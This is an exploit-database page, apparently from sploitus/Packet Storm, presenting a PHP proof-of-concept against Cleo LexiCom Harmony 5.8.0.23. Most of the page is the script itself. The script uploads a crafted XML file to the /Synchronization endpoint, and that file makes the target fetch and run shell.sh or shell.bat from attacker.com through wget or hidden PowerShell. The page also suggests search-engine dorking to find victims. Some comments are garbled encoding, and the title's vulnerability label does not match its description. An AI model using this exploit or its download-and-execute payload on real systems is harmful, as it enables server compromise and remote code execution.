Share
## https://sploitus.com/exploit?id=PACKETSTORM:189629
=============================================================================================================================================
| # Title : Cleo LexiCom Harmony 5.8.0.23 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://cleo.com |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Uploads a malicious XML file that can execute shell commands on the target.
Exploits CSRF to execute unauthorized commands via the application.
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] SeT target = Line : 34 + 39 + 68
[+] PayLoad :
<?php
function sendRequest($url, $data = null, $headers = [], $method = 'GET') {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}
if ($method == 'POST') {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
// ๐ ุงุณุชุบูุงู CSRF ูุฑูุน ู
ูู ุถุงุฑ ุฅูู ุงูุณูุฑูุฑ
function exploitCSRF($target) {
$boundary = "------------------------" . md5(rand(0, 99999));
// โ
ุฏุนู
ูู ู
ู Windows ู Linux
$payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
$payload .= "<Host>\n";
$payload .= " <Command><![CDATA[\n";
$payload .= " if [ \"\$(uname -s)\" = \"Linux\" ]; then\n";
$payload .= " wget http://attacker.com/shell.sh -O /tmp/shell.sh;\n";
$payload .= " chmod +x /tmp/shell.sh;\n";
$payload .= " /tmp/shell.sh;\n";
$payload .= " else\n";
$payload .= " powershell -NoProfile -ExecutionPolicy Bypass -Command \"";
$payload .= " Invoke-WebRequest -Uri 'http://attacker.com/shell.bat' -OutFile 'C:\\\\Windows\\\\Temp\\\\shell.bat'; ";
$payload .= " Start-Process -FilePath 'C:\\\\Windows\\\\Temp\\\\shell.bat' -WindowStyle Hidden\";\n";
$payload .= " fi\n";
$payload .= " ]]></Command>\n";
$payload .= "</Host>";
$postData = "--$boundary\r\n";
$postData .= "Content-Disposition: form-data; name=\"file\"; filename=\"exploit.xml\"\r\n";
$postData .= "Content-Type: application/xml\r\n\r\n";
$postData .= $payload . "\r\n";
$postData .= "--$boundary--\r\n";
$headers = [
"Content-Type: multipart/form-data; boundary=$boundary",
"VLSync: Multipart;l=0,Acknowledge"
];
$url = "$target/Synchronization";
$response = sendRequest($url, $postData, $headers, 'POST');
if (strpos($response, "Success") !== false) {
echo "[+] Exploit sent successfully!\n";
} else {
echo "[-] Exploit failed!\n";
}
}
// ๐ ุชุญุฏูุฏ ุงููุฏู
$target = "http://127.0.0.1";
exploitCSRF($target);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================